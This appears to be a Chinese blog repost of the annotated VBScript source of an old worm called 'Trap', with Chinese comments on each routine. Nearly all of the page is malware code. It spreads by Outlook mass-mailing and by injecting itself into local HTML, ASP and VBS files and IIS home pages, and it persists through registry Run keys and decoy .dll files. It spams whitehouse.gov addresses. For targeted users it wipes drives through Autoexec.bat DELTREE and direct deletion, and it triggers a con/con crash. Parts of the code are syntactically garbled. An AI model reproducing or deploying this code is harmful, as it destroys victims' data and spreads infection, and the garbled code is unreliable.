/'@ thank you! make use of other person to get rid of an enemy, trap _2001
/'这句话的意思可能是“借刀杀人”,然后是病毒名称“陷阱”
on error resume next
dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str
dim defpath, smailc, MAX_SIZE
dim whb(), title(10)
smailc = 4
Redim whb(smailc) ’白宫相关人员邮件名单
whb(0) = "president@whitehouse.gov"
whb(1) = "vice.president@whitehouse.gov "
whb(2) = "first.lady@whitehouse.gov"
whb(3) = "mrs.cheney@whitehouse.gov"
/'发送邮件的主題
title(0) = "Thanks for helping me!"
title(1) = "The police are investigating the robbery"
title(2) = "an application for a job "
title(3) = "The aspects of an application process pertinent to OSI"
title(4) = "What a pleasant weather. Why not go out for a walk?"
title(5) = "These countries have gone / been through too many wars"
title(6) = "We/'ve fixed on the 17th of April for the wedding"
title(7) = "The wind failed and the sea returned to calmness."
title(8) = "the sitting is open!"
title(9) = ""
defpath = "C://Readme.html" /' 病毒文件
MAX_SIZE = 100000 /' 定义传染文件的最大尺寸
MSWKEY = "HKEY_LOCAL_MACHINE//SoftWare//Microsoft//Windows//"
HCUW = "HKEY_CURRENT_USER//Software//Microsoft//WAB//"
main
sub main() /'主程序
on error resume next
dim w_s
w_s= WScript.ScriptFullName /'得到病毒文件本身的路径
if w_s = "" then
Err.Clear
set fso = CreateObject("Scripting.FileSystemObject") /'创建文件系统对象
if getErr then /'辨认病毒状态
Randomize /'初始化隨机种子
ra = int(rnd() * 7) /'产生隨机数
doucment.write title(ra) /' 写隨机内容
ExecuteMail /'执行邮件状态时的程序
else
ExecutePage /'执行 WEB 页状态时的程序
end if
else
ExecuteVbs /'执行 VBS 文件状态时的程序
end if
end sub
Function getErr() 忽略错误
if Err.number<>0 then
getErr=true
Err.Clear
else
getErr=false
end if
end function
sub ExecutePage() /'WEB 页状态时的程序
on error resume next
dim Html_Str, adi, wdf, wdf2,wdf3,wdsf, wdsf2, vf
Vbs_Str = GetScriptCode("vbscript") /'得到 VBScript 代码
Js_Str = GetJavaScript() /' 得到 Javascript 代码
Code_Str = MakeScript(encrypt(Vbs_str),true) /'得到已加密过的脚本代码
Html_Str = MakeHtml(encrypt(Vbs_str), true) /'得到已加密的完整HTML代码
Gf
/'定义病毒文件的路径
wdsf = w2 & "Mdm.vbs"
wdsf2 = w1 & "Profile.vbs"
wdf = w2 & "user.dll" /' 注意 wdf 和 wdf3 两个文件非常迷惑人
wdf2 = w2 & "Readme.html"
wdf3 = w2 & "system.dll"
/'创建病毒文件
set vf = fso.OpenTextFile (wdf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdsf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdsf2, 2, true)
vf.Write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdf2, 2, true)
vf.write Html_Str
vf.close
set vf = fso.OpenTextFile (wdf3, 2, true)
vf.write Code_Str
vf.close
修改注册表,让病毒文件在每一次计算机启动自动执行
Writereg MSWKEY & "CurrentVersion//Run//Mdm", wdsf, ""
Writereg MSWKEY & "CurrentVersion//RunServices//Profile", wdsf2, ""
SendMail /' 执行发送邮件程序
Hackpage /' 执行感染网站程序
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then /'遍历所有本地硬盘和网络共享硬盘
call SearchHTML(x & "//") /'执行文件感染程序
end if
next
if TestUser then /'检查用戶
Killhe 执行删除文件操作
else
if Month(Date) & Day(Date) = "75" then /'如系统时间为 7月5日
set vf = fso.OpenTextFile(w2 & "75.htm", 2,true) ’创建系统攻击文件
vf.write MakeScript ("window.navigate (/'c:/con/con/');", false)
vf.close
Writereg MSWKEY & "CurrentVersion//Run//75", w2 & "75.htm", "" /'自动启动
window.navigate "c:/con/con" /'立刻蓝屏,利用 Windows BUG,能引起 Win9X 系统100%死机(即无法恢复的蓝屏)
else /'如不是7.5
if fso.FileExists(w2 & "75.htm") then fso.DeleteFile w2 & "75.htm" /' 删除75.htm
end if
end if
if fso.FileExists(defpath) then fso.DeleteFile defpath /' 删除 C://Readme.html 病毒文件
end sub
sub ExecuteMail() /'邮件状态时执行的程序
on error resume next
Vbs_Str = GetScriptCode("vbscript")
Js_Str = GetJavaScript()
Set Stl = CreateObject("Scriptlet.TypeLib") /'创建 TypeLib对象
with Stl
.Reset
.Path = defpath
.Doc = MakeHtml(encrypt(Vbs_str), true)
.Write() /'创建 C://Readme.html 文件
end with
window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no" 打开会隐藏的窗口
end sub
sub ExecuteVbs() /' 同理,如病毒文件是 VBS 时所执行的程序
on error resume next
dim x, adi, wvbs, ws, vf
set fso = CreateObject("Scripting.FileSystemObject")
set wvbs = CreateObject("WScript.Shell")
Gf
wvbs.RegWrite MSWKEY & "Windows Scripting Host//Setings//Timeout", 0, "REG_DWORD"
set vf = fso.OpenTextFile (w2 & "system.dll", 1)
Code_Str = vf.ReadAll()
vf.close
Hackpage
SendMail
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x & "//")
end if
next
if TestUser then Killhe
end sub
sub Gf() /'得到系统路径
w1=fso.GetSpecialFolder(0) & "//"
w2=fso.GetSpecialFolder(1) & "//"
end sub
function Readreg(key_str) /'读注册表
set tmps = CreateObject("WScript.Shell")
Readreg = tmps.RegRead(key_str)
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype) /'写注册表
set tmps = CreateObject("WScript.Shell")
if vtype="" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing
end function
function MakeHtml(Sbuffer, iHTML) /'创建HTML 文件的完整代码
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml="<" & "HTML><" & "HEAD><" & "TITLE>" & title(ra) & "</" & "TITLE><" & "/HEAD>" & _
"<BO" & "AD>" & vbcrlf & MakeScript(Sbuffer, iHTML) & vbcrlf & _
"<" & "/BOAD><" & "/HTML>"
end Function
function MakeScript(Codestr, iHTML) /'此程序是病毒进行自我加密过程,较为复杂,不再描述
if iHTML then
dim DocuWrite
DocuWrite = "document.write(/'</'+" & "/'SCRIPT Language=JavaScript>//n/'+" & _
"jword" & "+/'//n<//'" & "+/'SCRIPT>/');"
DocuWrite = DocuWrite & vbcrlf & "document.write(/'</'+" & "/'SCRIPT Language=VBScript>//n/'+" & _
"nword" & "+/'//n<//'" & "+/'SCRIPT>/');"
MakeScript="<" & "SCRIPT Language=JavaScript>" & vbcrlf & "var jword = " & _
chr(34) & encrypt(Js_Str) & chr(34) & vbcrlf & "var nword = " & _
chr(34) & Codestr & chr(34) & vbcrlf & "nword = unescape(nword);" & vbcrlf & _
"jword = unescape(jword);" & vbcrlf & DocuWrite & vbcrlf & "</" & "SCRIPT>"
else
MakeScript= "<" & "SCRIPT Language=JavaScript>" & Codestr & "</" & "SCRIPT>"
end if
end function
function GetScriptCode(Languages) /' 得到不同脚本语言的代码
dim soj
for each soj in document.scripts
if LCase(soj.Language) = Languages then
if Languages = "javascript" then
if len(soj.Text)> 200 then
else
GetScriptCode = soj.Text
exit function
end if
else
GetScriptCode = soj.Text
exit function
end if
end if
next
end function
function GetJavaScript()
GetJavaScript = GetScriptCode("javascript")
end function
function TestUser() /'检测用户过程
on error resume next
dim keys(6), i, tmpStr, Wnet
/'特定用户关键词
keys(0) = "white home"
keys(1) = "central intelligence agency"
keys(2) = "bush"
keys(3) = "american stock exchang"
keys(4) = "chief executive"
keys(5) = "usa"
TestUser = false
Set Wnet = CreateObject("WScript.Network") /'创建网络对象
/'下面一共3个循环,作用一样,是检查用户的 Domain、用户名和计算机名是否含有以上的5个关键词语,一旦含有程序将返回”真”的条件,从而对这些用户的文件进行疯狂删除。
tmpStr = LCase(Wnet.UserName) /'
for i=0 to 4
if InStr(tmpStr, keys(i)) > 0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.ComputerName)
for i=0 to 4
if InStr(tmpStr, keys(i)) > 0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.UserDomain)
for i=0 to 4
if InStr(tmpStr, keys(i)) >0 then
TestUser=true
exit function
end if
next
Set Wnet = Nothing
end function
function SendMail() /'发送文件过程
on error resume next
dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at
/'首先向 OutLook 地址簿发送带能直接感染文件的已加密的病毒代码和HTML 附件
主題是隨机的,此过程与“欢乐时光“类似,所以不再描述
Randomizeat=fso.GetSpecialFolder(1) & "//Readme.html"
set Oa = CreateObject("Outlook.Application")
set wab = Oa.GetNameSpace("MAPI")
for j = 1 to wab.AddressLists.Count
eins = wab.AddressLists(j)
wreg=Readreg (HCUW & eins)
if (wreg="") then wreg = 1
Eaec = eins.AddressEntries.Count
if (Eaec > Int(wreg)) then
for x = 1 to Eaec
arrsm = wab.AddressEntries(x)
areg = Readreg(HCUW & arrsm)
if (areg = "") then
set fm = wab.CreateItem(0)
with fm
ra = int(rnd() * 7)
.Recipients.Add arrsm
.Subject = title(ra)
.Body = title(ra)
.Attachments at
.Send
Writereg HCUW & arrsm, 1, "REG_DWORD"
end with
end if
next
end if
Writereg HCUW & eins, Eaec, ""
next
/'下面是对指定的用户无条件发送大量病毒邮件, 从这一点可看出病毒作者对美国政府的极度不满。
for j = 1 to smailc
arrsm = whb(j)
set fm = wab.CreateItem(0)
ra = int(rnd() * 7)
with fm
.Recipients.Add arrsm
.Subject = title(ra)
.Body = title(ra)
.Send
end with
next
set Oa = Nothing
window.setTimeout "SendMail()", 5000 /'每隔 5 秒种重复发送
end function
sub SearchHTML(Path) /'搜索可传染文件的过程
on error resume next
dim pfo, psfo, pf, ps, pfi, ext
if instr(Path, fso.GetSpecialFolder(2)) > 0 then exit sub
if Path <> "E://" then exit sub
set pfo = fso.GetFolder(Path)
set psfo = pfo.SubFolders
for each ps in psfo
SearchHTML(ps.Path)
set pf = ps.Files
for each pfi in pf
ext = LCase(fso.GetExtensionName(pfi.Path))
if instr(ext, "htm") > 0 or ext = "plg" or ext = "asp" then /'检查文件的扩展名是否为 htm、html、plg 如是则检查是否被感染,如未被感染则将已加密的病毒代码插入文件头,这样文件一旦执行也会执行病毒代码,而且不会影响原文件的正常执行。
if Code_Str<>"" then AddHead pfi.Path, pfi, 1
elseif ext= "vbs" then /'如是 vbs 文件,则插入未加密的病毒代码
AddHead pfi.Path,pfi, 2
end if
next
next
end sub
sub Killhe() /'全盘删除文件过程
on error resume next
dim codeText, ko,adi, kd, kh, ks,kf,kfs
codeText = "@ECHO OFF" & vbcrlf & "PATH " & w1 & "COMMAND" & vbcrlf &_
"DELTREE c://" /'将删除C盘的命令插入Autoexec.bat 中,下次开机时,删除整个硬盘,并沒有任何提示
set ko = fso.OpenTextFile("C://Autoexec.bat", 8, true)
ko.Write vbcrlf & codeText
ko.Close
/'接着立刻删除其它盘的所有文件
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 then
set kd = fso.GetFolder(x & "//")
set kfs = kd.Files
for each kf in kfs
kf.Delete
next
set ks = kd.SubFolders
for each kh in ks
kh.Delete
next
end if
next
do while 1 /'让系统立刻死机
window.open ""
loop
end sub
sub Hackpage() /' 此过程是直接攻击 Mircosoft IIS 服务器主页过程
dim fi
H = "C://InetPut//wwwroot"
if fso.FolderExists(H) then
/'判断是否为网站,如是则将已加密的带病毒代码插入文件头,从而直接传染浏览该网站的用户
set fi = fso.GetFile(H & "//index.htm")AddHead H & "//index.htm",fi,1
end if
end sub
sub AddHead(Path, f, t) /'此过程是病毒传染文件具体过程
on error resume next
dim tso, buffer,sr
if f.size > MAX_SIZE then exit sub /'传染大小小于100K的文件
set tso = fso.OpenTextFile(Path, 1, true)
buffer = tso.ReadAll()
tso.close
if (t = 1) then
if UCase(Left(LTrim(buffer), 7)) <> "<SCRIPT" then
set tso = fso.OpenTextFile(Path, 2, true)
tso.Write Code_Str & vbcrlf & buffer /'插入到文件头
tso.close
end if
else
if mid(buffer, 3, 2) <> "/'@" then
tso.close
sr=w2 & "user.dll"
if fso.FileExists(sr) then fso.CopyFile sr, Path
end if
end if
end sub
一个老病毒的部分源码加注释
最新推荐文章于 2018-04-18 19:31:00 发布
<script type='text/javascript'> google_ad_client = 'pub-8112432724706407'; google_ad_width = 728; google_ad_height = 90; google_ad_format = '728x90_as'; google_ad_type = 'text_image'; google_ad_channel = ''; </script><script type='text/javascript' src='http://pagead2.googlesyndication.com/pagead/show_ads.js'> </script>
一个老病毒的部分源码加注释